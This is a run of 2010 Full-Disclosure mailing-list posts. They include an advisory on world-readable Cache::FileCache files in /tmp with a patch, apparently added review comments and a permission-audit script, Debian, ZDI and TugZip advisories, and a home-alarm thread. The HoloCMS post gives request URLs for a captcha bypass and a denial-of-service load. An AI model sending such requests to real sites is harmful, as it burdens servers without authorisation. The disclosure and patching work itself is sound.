Re: [Full-disclosure] FileCache: tmp file permission vulnerability.
Vladimir Lettiev wrote:

>> Perl Cache-Cache-1.06 ... stores its default file cache
>> in /tmp with world read/write permissions. ...
>
> This is documented behaviour. You can override insecure default cache
> root and umask with options 'cache_root' and 'directory_umask':
>
> use Cache::FileCache;
> use File::Temp qw/ tempdir /;
>
> # tempdir() needs at least four trailing X's in its template; TMPDIR => 1
> # creates the directory under $TMPDIR instead of the current directory.
> my $cache = Cache::FileCache->new( {
>     'cache_root'      => tempdir( 'CacheXXXX', TMPDIR => 1 ),
>     'directory_umask' => 077,
> } );

The default should be secure. Interested people, with intimate knowledge
of inner workings, might go to contortions and change to insecure.

Cheers, Paul

Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney   Australia

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FileCache: tmp file permission vulnerability.
On Thu, Apr 01, 2010 at 11:30:50PM -0400, bugs lists wrote:
>
> FileCache: tmp file permission vulnerability.
> Larry W. Cashdollar
> Vapid Labs http://vapid.dhs.org
> 2/16/2010
>
> Perl Cache-Cache-1.06 is a memory and file caching module for perl. It
> stores its default file cache in /tmp with world read/write permissions. A
> local attacker can use this cache to glean information from applications
> using the module, regardless of whether the transaction is taking place over
> an encrypted SSL session.

This is documented behaviour. You can override insecure default cache root
and umask with options 'cache_root' and 'directory_umask':

use Cache::FileCache;
use File::Temp qw/ tempdir /;

# tempdir() needs at least four trailing X's in its template; TMPDIR => 1
# creates the directory under $TMPDIR instead of the current directory.
my $cache = Cache::FileCache->new( {
    'cache_root'      => tempdir( 'CacheXXXX', TMPDIR => 1 ),
    'directory_umask' => 077,
} );

--
Vladimir Lettiev aka crux
[Full-disclosure] Vulnerabilities in HoloCMS
Hello Full-Disclosure!

I want to warn you about security vulnerabilities in HoloCMS.

- Advisory: Vulnerabilities in HoloCMS
- URL: http://websecurity.com.ua/4068/
- Timeline:
  17.03.2010 - found vulnerabilities.
  25.03.2010 - disclosed at my site.
  27.03.2010 - informed developers.

- Details:

These are Insufficient Anti-automation and Denial of Service vulnerabilities.
The vulnerabilities exist in the captcha script CaptchaSecurityImages.php,
which is used in this system. I already reported about vulnerabilities in
CaptchaSecurityImages (http://websecurity.com.ua/4043/).

Insufficient Anti-automation:

http://site/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Captcha bypass is possible both via semi-automated or automated (using OCR)
methods, which were mentioned before (http://websecurity.com.ua/4043/), and via
the session reuse with constant captcha bypass method
(http://websecurity.com.ua/1551/), which was described in the project Month of
Bugs in Captchas. The last variant of attack is possible due to incorrect
implementation of protection in the system against this captcha bypass method
(only in 1.x versions).

DoS:

http://site/captcha/CaptchaSecurityImages.php?width=1000&height=9000

By setting large values of width and height it's possible to create a large load
on the server.

Vulnerable are HoloCMS 1.3.1, 3.1 and previous versions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] [SECURITY] [DSA 2026-1] New netpbm-free packages fix denial of service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2026-1                   secur...@debian.org
http://www.debian.org/security/                          Giuseppe Iuculano
April 02, 2010                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : netpbm-free
Vulnerability  : stack-based buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id         : CVE-2009-4274
Debian Bug     : 569060

Marc Schoenefeld discovered a stack-based buffer overflow in the XPM reader
implementation in netpbm-free, a suite of image manipulation utilities. An
attacker could cause a denial of service (application crash) or possibly
execute arbitrary code via an XPM image file that contains a crafted header
field associated with a large color index value.

For the stable distribution (lenny), this problem has been fixed in
version 2:10.0-12+lenny1.

For the testing distribution (squeeze), this problem has been fixed in
version 2:10.0-12.1+squeeze1.

For the unstable distribution (sid), this problem will be fixed soon.

Due to a problem with the archive system it is not possible to release all
architectures. The missing architectures will be installed into the archive
once they become available.

We recommend that you upgrade your netpbm-free package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64,
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0-12+lenny1.dsc
    Size/MD5 checksum:     1170 fa9aeb6e0fea3225fd5052b0ec0367a1
  http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0.orig.tar.gz
    Size/MD5 checksum:  1926538 985e9f6d531ac0b2004f5cbebdeea87d
  http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm-free_10.0-12+lenny1.diff.gz
    Size/MD5 checksum:    50581 1c11ea48609ce48dd8033e076d5600a4

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-12+lenny1_alpha.deb
    Size/MD5 checksum:    85754 ee6a4c6985623b01251b2eea34f3b0ed
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-12+lenny1_alpha.deb
    Size/MD5 checksum:    77066 3f446c0ba741db2fa3bcfd23d364dd49
  http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-12+lenny1_alpha.deb
    Size/MD5 checksum:  1418402 ae06867d12399db5347715dc4ec2a7a9
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-12+lenny1_alpha.deb
    Size/MD5 checksum:   138666 7a9f884eb231e458af1ecf0f3eccfa95
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-12+lenny1_alpha.deb
    Size/MD5 checksum:   139220 815b677ff56f0ca1d565f9d0ae0fd783

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-12+lenny1_amd64.deb
    Size/MD5 checksum:  1316736 fcc0ee53a1e98cdd555bf64082dff7de
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-12+lenny1_amd64.deb
    Size/MD5 checksum:   121202 7b8458cfacab39974af0455f6cd1d740
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-12+lenny1_amd64.deb
    Size/MD5 checksum:    79746 56f418df417d027e2424d57ac6196718
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-12+lenny1_amd64.deb
    Size/MD5 checksum:    71600 0f9251a5ac278afd7c9ac0def7f542aa
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9-dev_10.0-12+lenny1_amd64.deb
    Size/MD5 checksum:   121328 efaf769ff3769c8253af36a20facd612

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10-dev_10.0-12+lenny1_arm.deb
    Size/MD5 checksum:   110038 de55f1c7285508902453d36280a3473a
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm9_10.0-12+lenny1_arm.deb
    Size/MD5 checksum:    70448 9258f240185bff2f2aeb6e2acf7abe07
  http://security.debian.org/pool/updates/main/n/netpbm-free/netpbm_10.0-12+lenny1_arm.deb
    Size/MD5 checksum:  1289442 e2155667bdef26b4a56082d1954aede2
  http://security.debian.org/pool/updates/main/n/netpbm-free/libnetpbm10_10.0-12+lenny1_arm.deb
    Size/MD5 checksum:    62610 88cb6d123e7585524c455f84cf7eee06
  http://security.debian.org/pool/updates/main
Re: [Full-disclosure] Security system
Fucking love it

On Tue, Mar 30, 2010 at 3:30 PM, T Biehn wrote:
> Buy a prepaid cell, rig your comp & phone up to a battery backup.
> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>
> Have the text message banged out on the prepaid, rig wires from the
> breakout board to the cell phone, rig wires from your security sensors
> into your breakout board. App to listen on com port send a nice high
> signal to the pin connecting to your send key.
>
> Done.
>
> Like, $50 for the phone incl. minutes.
> Like less than $20 for a breakout board.
>
> Also, rig the ringer up to an input on the breakout board and you can
> call your phone to clear your FDE keys from RAM and kill your machine
> if you think the man is paying a visit once you get a text :)
>
> Some adversaries will cut net, hardline, sometimes power.
>
> Attacks: GSM jammers, which everyone has.
>
> -Travis
>
> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote:
>> Try arduino + internet.
>>
>> 2010/3/27
>>>
>>> Anyone got any ideas how I would program a system to call me from a
>>> VoIP network to alert me of a home security breach.
>>>
>>> Sent from my iPhone
>
> --
> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da

--
A man goes to the doctor. Says he's depressed. He says life seems harsh and
cruel. Says he feels all alone in a threatening world where what lies ahead is
vague and uncertain. The doctor says "The treatment is simple. The great clown
Pagliacci is in town tonight. Go and see him, that should pick you up." The man
bursts into tears. He says "But doctor... I am Pagliacci."
[Full-disclosure] FileCache: tmp file permission vulnerability.
FileCache: tmp file permission vulnerability.
Larry W. Cashdollar
Vapid Labs http://vapid.dhs.org
2/16/2010

Perl Cache-Cache-1.06 is a memory and file caching module for perl. It
stores its default file cache in /tmp with world read/write permissions. A
local attacker can use this cache to glean information from applications
using the module, regardless of whether the transaction is taking place over
an encrypted SSL session.

r...@dev-unix-sec01:/tmp# ls -l --color=no
total 200
drwxrwxrwx 3 root root 4096 Feb 10 12:53 FileCache

r...@dev-unix-sec01:/tmp/FileCache/Default# ls -l --color=no
total 64
drwxrwxrwx 17 root root 4096 Feb 11 16:10 0
drwxrwxrwx 18 root root 4096 Feb 10 15:50 1
drwxrwxrwx 18 root root 4096 Feb 11 16:11 2
drwxrwxrwx 16 root root 4096 Feb 11 16:09 3
drwxrwxrwx 18 root root 4096 Feb 10 15:51 4
drwxrwxrwx 17 root root 4096 Feb 11 16:09 5
drwxrwxrwx 18 root root 4096 Feb 10 15:51 6
drwxrwxrwx 15 root root 4096 Feb 11 16:09 7
drwxrwxrwx 17 root root 4096 Feb 10 15:51 8
drwxrwxrwx 18 root root 4096 Feb 11 16:10 9
drwxrwxrwx 17 root root 4096 Feb 10 15:51 a
drwxrwxrwx 17 root root 4096 Feb 11 16:09 b
drwxrwxrwx 17 root root 4096 Feb 11 16:10 c
drwxrwxrwx 18 root root 4096 Feb 11 16:11 d
drwxrwxrwx 17 root root 4096 Feb 11 16:09 e
drwxrwxrwx 16 root root 4096 Feb 11 16:10 f

r...@dev-unix-sec01:/tmp/FileCache/Default/f/f/9# ls -l --color=no
total 64
-rw-r--r-- 1 root root  8035 Feb 12 08:39 ff9984b83c656ad4884e116bcf60fdca16be6483
-rw-r--r-- 1 root root 51521 Feb 12 08:37 ff9ebcc002b4067391f0baae96c3e23e8ef248a8

r...@dev-unix-sec01:/tmp/FileCache/Default/f/f/9# strings ff9984b83c656ad4884e116bcf60fdca16be6483 | more
prod-mail-list02.example.com
Cache::Object
_Size
Kv
_Expires_At
_KeyKuZ
_Created_At
adduser-3.105ubuntu1
apache2-2.2.8-1ubuntu0.11
apache2.2-common-2.2.8-1ubuntu0.11
apache2-mpm-worker-2.2.8-1ubuntu0.11
apache2-utils-2.2.8-1ubuntu0.11
apt-0.7.9ubuntu17.2
aptitude-0.4.9-2ubuntu5
apt-utils-0.7.9ubuntu17.2
at-3.1.10ubuntu4
atsar-1.7-2
base-files-4.0.1ubuntu5.8.04.7
base-passwd-3.5.16

This can be fixed with a simple patch:

la...@brazil:~/Desktop/Cache-Cache-1.06/lib/Cache$ diff -Nur FileCache.pm 1
--- FileCache.pm	2009-02-28 19:53:14.0 -0500
+++ 1	2010-02-12 21:13:31.0 -0500
@@ -35,7 +35,7 @@
 # by default, the root of the cache is located in 'FileCache'.  On a
 # UNIX system, this will appear in "/tmp/FileCache/"

-my $DEFAULT_CACHE_ROOT = "FileCache";
+my $DEFAULT_CACHE_ROOT = qw(FileCache_) . $>;

 # by default, the directories in the cache on the filesystem should
@@ -43,7 +43,7 @@
 # potential security concern, the actual cache entries are written
 # with the user's umask, thus reducing the risk of cache poisoning

-my $DEFAULT_DIRECTORY_UMASK = 000;
+my $DEFAULT_DIRECTORY_UMASK = 077;

 sub Clear

Cache::Cache is no longer being developed;
http://search.cpan.org/~jswartz/CHI-0.34/lib/CHI.pm should be used instead.

http://vapid.dhs.org/w/doku.php?id=perl_cache:cache_filecache_permissions_issue
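Review bot: in the first hunk, `+my $DEFAULT_CACHE_ROOT = qw(FileCache_) . $>;` makes the default root per-user by name only; it still lives under the world-writable /tmp and nothing in the hunk verifies that an already existing `/tmp/FileCache_<uid>` is owned by the current user with the expected mode, so a local user who creates that name (or a symlink of that name) first is not excluded by this change. Create the root with a mkdtemp-style call or check ownership and mode before using an existing directory. Two smaller points: `qw(FileCache_)` in scalar context happens to yield the one string, but a plain `"FileCache_"` says what is meant, and the untouched context comment `# UNIX system, this will appear in "/tmp/FileCache/"` is now wrong.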
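Review bot: the second hunk's `+my $DEFAULT_DIRECTORY_UMASK = 077;` changes only the directory permissions; the context comment directly above it (`# potential security concern, the actual cache entries are written` / `# with the user's umask`) says the entry files keep the process umask, and the listing in this message shows them at -rw-r--r--, so after this change the confidentiality of the entries rests entirely on the 0700 directories. Either give the entry files a matching restrictive default, or rewrite that comment so the remaining dependency on the caller's umask is stated rather than left reading as if the directory change were a complete fix.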
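The private-cache construction from Vladimir's reply and the permission check that the listing above invites, as one added example (editor's code, not code from Cache::Cache or from either poster). It assumes Cache::Cache is installed; the namespace, key, value and expiry are made up, and the audit helper world_accessible() is an editor's helper, not a Cache::FileCache method:

```perl
#!/usr/bin/perl
# Added example: build a Cache::FileCache whose root, directories and entries
# are private to the current user, then audit a cache tree for anything other
# users can reach. Assumes Cache::Cache is installed; 'example', the key and
# the value below are constructed for the demo.
use strict;
use warnings;
use Cache::FileCache;
use File::Temp qw(tempdir);
use File::Find qw(find);
use Fcntl qw(:mode);

# Entries are written with the process umask (see the comment quoted in the
# patch above), so tighten it before the cache writes anything at all.
umask 077;

# mkdtemp-style private root (0700) under $TMPDIR. File::Temp requires at
# least four trailing X's in the template; TMPDIR => 1 keeps the directory
# out of the current working directory, CLEANUP => 1 removes it at exit.
my $root = tempdir( 'FileCacheXXXXXX', TMPDIR => 1, CLEANUP => 1 );

my $cache = Cache::FileCache->new( {
    namespace       => 'example',    # assumption: any namespace works here
    cache_root      => $root,
    directory_umask => 077,          # hashed subdirectories come out 0700, not 0777
} );

$cache->set( 'session:42', 'constructed secret blob', '10 minutes' );
my $back = $cache->get('session:42');
die "round trip failed\n"
    unless defined $back && $back eq 'constructed secret blob';

# Walk a cache tree and return every entry that group or other can read,
# write or traverse. Against /tmp/FileCache this reproduces the finding in
# the advisory; against $root it should return nothing.
sub world_accessible {
    my ($top) = @_;
    my @exposed;
    find( sub {
        my @st = lstat $_ or return;          # $_ is the basename, cwd is its dir
        push @exposed, $File::Find::name
            if $st[2] & ( S_IRWXG | S_IRWXO );
    }, $top );
    return @exposed;
}

my @bad = world_accessible($root);
print @bad
    ? "exposed under $root:\n" . join( "\n", @bad ) . "\n"
    : "nothing under $root is reachable by other users\n";

if ( -d '/tmp/FileCache' ) {
    my @leaks = world_accessible('/tmp/FileCache');
    printf "%d entries under /tmp/FileCache are reachable by other users\n",
        scalar @leaks;
}
```

The umask call matters as much as directory_umask: with the module's defaults and a typical 022 umask the directories are 0777 and the entries 0644, exactly what the ls output above shows, and only the combination of a 0700 root and 0600 entries closes both the traversal and the direct-read paths.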
[Full-disclosure] Apple patent lawyers fail to close ddtek, Defcon CTF goes on
FOR IMMEDIATE RELEASE
1 APRIL 2010

DEFCON CTF QUALIFIER ANNOUNCED

Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of
qualification for DEFCON 18 CTF. Stock up on Red Bull, put the pizza delivery
on speed dial, polish up your fancy shellcodes, and replenish the duct tape
supply. The competition for these coveted spots will be held over 55 non-stop
hours 21-24 May. When the dust clears only the 10 best will be invited to join
us this summer in sin city for the annual DEFCON deathmatch. In historical
fashion VedaGodz will automatically be permitted contest entry. However, we wish
to point out that real ninjas would still attempt to qualify.

The qualification round will again be in the style of a game board, but answers
need not be in the form of a question. Categories will require teams to
demonstrate the superiority of hacking across a vast realm of security. This
isn't CTF like your mama used to make. Level 1 questions make CISSPs turn red,
Level 2 make SANS Fellows cry in frustration, Level 3 are typically only
answerable by sheep of above average barnyard intelligence, you get the idea.

Pause your atari emulator and hop over to ddtek.biz to register. Only those that
pre-register are permitted to play.

Registration site:   http://ddtek.biz/register.html
Registration opens:  01 Apr 2010 00:00:00 UTC
Registration ends:   20 May 2010 00:00:00 UTC
Qualifications open: 21 May 2010 19:00:00 UTC
Qualifications end:  24 May 2010 02:00:00 UTC

More information will follow via your registered email address.

Those with SANS certs need not apply. CISSPs are right out.*

v...@n Difensiva
Senior Engineer
Diuntinus Defense Technologies, Inc.

*CEH holders...well, we sorta feel a little bit sorry for those that admit to
holding this cert and abstain from mocking.
[Full-disclosure] [CORELAN]-10-018 - TugZip 3.5
Corelan Team [ EIP Hunters ] - http://www.corelan.be:8800

Advisory: CORELAN-10-018
Disclosure date : April 1st, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-018

00 : Vulnerability information

Product : TugZip
Version : 3.5.0.0 (latest version)
Vendor : Christian Kindahl / tugzip.com
URL : http://www.tugzip.com/index.php?page=downloads
Platform : Windows
Type of vulnerability : Stack overflow
Risk rating : High
Issue fixed in version :
Vulnerability discovered by : Lincoln
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/

01 : Vendor description of software

From the vendor website:

"TUGZip is a powerful award-winning freeware archiving utility for Windows that
provides support for a wide range of compressed, encoded and disc-image files,
as well as very powerful features; all through an easy to use application
interface and Windows Explorer integration. Try this great free archiving
utility!"

02 : Vulnerability details

When a specially crafted zip file is opened by TugZip, an exception handler gets
overwritten, allowing arbitrary code execution to be triggered.

There are a few ways to trigger the vulnerability :
- open the zip file from within TugZip
- associate zip files with TugZip and double-click on the zip file
- associate zip files with TugZip and open a zip file from a URL

No user intervention is required (except for opening the file) to gain code
execution.

03 : Author/Vendor communication

March 23 2010 : author contacted
March 28 2010 : sent reminder
April 1 2010 : No response, public disclosure
Re: [Full-disclosure] Security system
Good, they have minds of their own.

On Fri, Apr 2, 2010 at 3:03 PM, T Biehn wrote:
> Can't hurt.
> I don't trust machines in DCs much less VPSs.
>
> An adversary with the resources and motivation to kill power, net, and
> jam GSM when they're pwning your house would probably be able to know
> about and take out your watchdog box in the same move.
>
> -Travis
>
> On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton wrote:
> > On Tuesday, March 30, 2010, T Biehn wrote:
> >> Nah, I'm saying a GSM jammer would block your prepaid cell signal.
> >>
> >> So if your adversary were to cut the power, cut the net AND jam GSM
> >> you'd be out of luck in getting notification.
> >
> > Very true, though you can combine this with a remote box that reacts iff it
> > can no longer reach your home box. That way they can't just block outgoing
> > signals and be clear.
> >
> >>
> >> You can get all fancy and have your program try all methods available.
> >> Cell, Wired Net, WIFI (throw an antenna on your roof,) pager, etc.
> >>
> >> -Travis
> >>
> >> On Tue, Mar 30, 2010 at 10:39 AM, wrote:
> >>> Good idea, you're saying also I should buy a GSM jammer, this is a good
> >>> idea, I will try.
> >>>
> >>> Sent from my iPhone
> >>>
> >>> On Mar 30, 2010, at 11:30 AM, T Biehn wrote:
> >>>
> Buy a prepaid cell, rig your comp & phone up to a battery backup.
> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>
> Have the text message banged out on the prepaid, rig wires from the
> breakout board to the cell phone, rig wires from your security sensors
> into your breakout board. App to listen on com port send a nice high
> signal to the pin connecting to your send key.
>
> Done.
>
> Like, $50 for the phone incl. minutes.
> Like less than $20 for a breakout board.
>
> Also, rig the ringer up to an input on the breakout board and you can
> call your phone to clear your FDE keys from RAM and kill your machine
> if you think the man is paying a visit once you get a text :)
>
> Some adversaries will cut net, hardline, sometimes power.
>
> Attacks: GSM jammers, which everyone has.
>
> -Travis
>
> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar wrote:
> >
> > Try arduino + internet.
> >
> > 2010/3/27
> >>
> >> Anyone got any ideas how I would program a system to call me from a
> >> VoIP network to alert me of a home security breach.
> >>
> >> Sent from my iPhone
>
> --
> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
> >>>
> >>
> >>
> >>
> >> --
> >> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
> >> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> >> http://pastebin.com/f6fd606da
> >
>
> --
> FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> http://pastebin.com/f6fd606da
[Full-disclosure] Non ZDI Post - EOM
Re: [Full-disclosure] Security system
> An adversary with the resources and motivation to kill power, net, and
> jam GSM when they're pwning your house would probably be able to know
> about and take out your watchdog box in the same move.
>

Reminds me of the adage "Locks keep honest people honest".

Dream up all the fancy security and countermeasures you want .. but it still
makes more sense to just take reasonable proactive steps to make your house
less attractive to burglars than the ones next door .. and have good insurance.

The geeky stuff is more fun to think up and implement, but trimming the hedges
and installing some exterior lights works better.

Cheers,

Michael Holstein
Cleveland State University
[Full-disclosure] ZDI-10-050: Mozilla Firefox nsTreeSelection EventListener Remote Code Execution Vulnerability
ZDI-10-050: Mozilla Firefox nsTreeSelection EventListener Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-050
April 2, 2010

-- CVE ID:
CVE-2010-0175

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.5.x

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
software utilizing a vulnerable version of Mozilla's Firefox. User interaction
is required in that the victim must visit a malicious website or be coerced
into opening a malicious document.

The specific flaw exists within how the application handles particular events
for an nsTreeSelection element. Upon execution of a "select" event the
application will access an element without checking to see if it's been
previously freed or not. Successful exploitation can lead to code execution
under the context of the application.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-17.html

-- Disclosure Timeline:
2010-01-15 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * regenrecht

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a
best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the
ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
TippingPoint does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, TippingPoint provides its
customers with zero day protection through its intrusion prevention technology.
Explicit details regarding the specifics of the vulnerability are not exposed
to any parties until an official vendor patch is publicly available.
Furthermore, with the altruistic aim of helping to secure a broader user base,
TippingPoint provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
[Full-disclosure] ZDI-10-049: Mozilla Firefox PluginArray nsMimeType Dangling Pointer Remote Code Execution Vulnerability
ZDI-10-049: Mozilla Firefox PluginArray nsMimeType Dangling Pointer Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-049
April 2, 2010

-- CVE ID:
CVE-2010-0177

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.5.x

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is required to
exploit this vulnerability in that a user must be coerced to viewing a
malicious document.

The specific flaw exists within the way the application implements the
window.navigator.plugins array. Due to the application freeing the contents of
the array while a reference to one of the elements is still being used, an
attacker can utilize the free reference to call arbitrary code. Successful
exploitation can lead to code execution under the context of the application.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-19.html

-- Disclosure Timeline:
2010-01-06 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * regenrecht
[Full-disclosure] ZDI-10-048: Mozilla Firefox nsTreeContentView Dangling Pointer Remote Code Execution Vulnerability
ZDI-10-048: Mozilla Firefox nsTreeContentView Dangling Pointer Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-048
April 2, 2010

-- CVE ID:
CVE-2010-0176

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.5.x

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is required in
that the victim must visit a malicious website or be coerced into opening a
malicious document.

The specific flaw exists within the way that Mozilla's Firefox parses .XUL
files. While appending a particular tag to a treechildren container, the
application will create more than one reference to a particular element without
increasing its reference count. Upon removal of one of the elements, the
refcount will be decreased causing the application to free the memory
associated with the object. Due to the rogue reference occurring, the next time
the application attempts to reference that container, the application will
access memory that has been freed which can lead to code execution under the
context of the application.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-18.html

-- Disclosure Timeline:
2010-01-06 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * regenrecht
[Full-disclosure] ZDI-10-047: Mozilla Firefox libpr0n imgContainer Bits-Per-Pixel Change Remote Code Execution Vulnerability
ZDI-10-047: Mozilla Firefox libpr0n imgContainer Bits-Per-Pixel Change Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-047
April 2, 2010

-- CVE ID:
CVE-2010-0164

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.6.x

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by
Digital Vaccine protection filter ID 9620. For further product information on
the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.

The specific flaw exists within the libpr0n library which is responsible for
handling image caching and animation and is due to the way the application
handles animations received from the server via the multipart/x-mixed-replace
mimetype. During a case where the bits-per-pixel changes, the application will
free a pointer and then can be made to reuse the freed pointer later. This can
lead to code execution under the context of the application.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-09.html

-- Disclosure Timeline:
2010-02-18 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * regenrecht
[Full-disclosure] ZDI-10-046: Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability
ZDI-10-046: Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-046
April 2, 2010

-- CVE ID:
CVE-2010-0160

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.6.x

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9619. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists within the implementation of web worker threads. Due to mishandling the array data type while processing posted messages, a web worker thread can be made to corrupt heap memory. An attacker can exploit this vulnerability to execute arbitrary code under the context of the user running the browser.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-02.html

-- Disclosure Timeline:
2009-12-04 - Vulnerability reported to vendor
2010-04-02 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Orlando Barrera II, SecTheory
[Full-disclosure] ZDI-10-045: Apple QuickTime MPEG-1 genl Atom Remote Code Execution Vulnerability
ZDI-10-045: Apple QuickTime MPEG-1 genl Atom Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-045
April 2, 2010

-- CVE ID:
CVE-2010-0526

-- Affected Vendors:
Apple

-- Affected Products:
Apple OS X

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9629. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of MPEG content. Upon reading a field used for compression within a 'genl' atom in the movie container, the application will decompress outside the boundary of an allocated buffer. Successful exploitation can lead to code execution under the context of the application.

-- Vendor Response:
Apple states:

http://support.apple.com/kb/HT4104
http://support.apple.com/kb/HT4077

-- Disclosure Timeline:
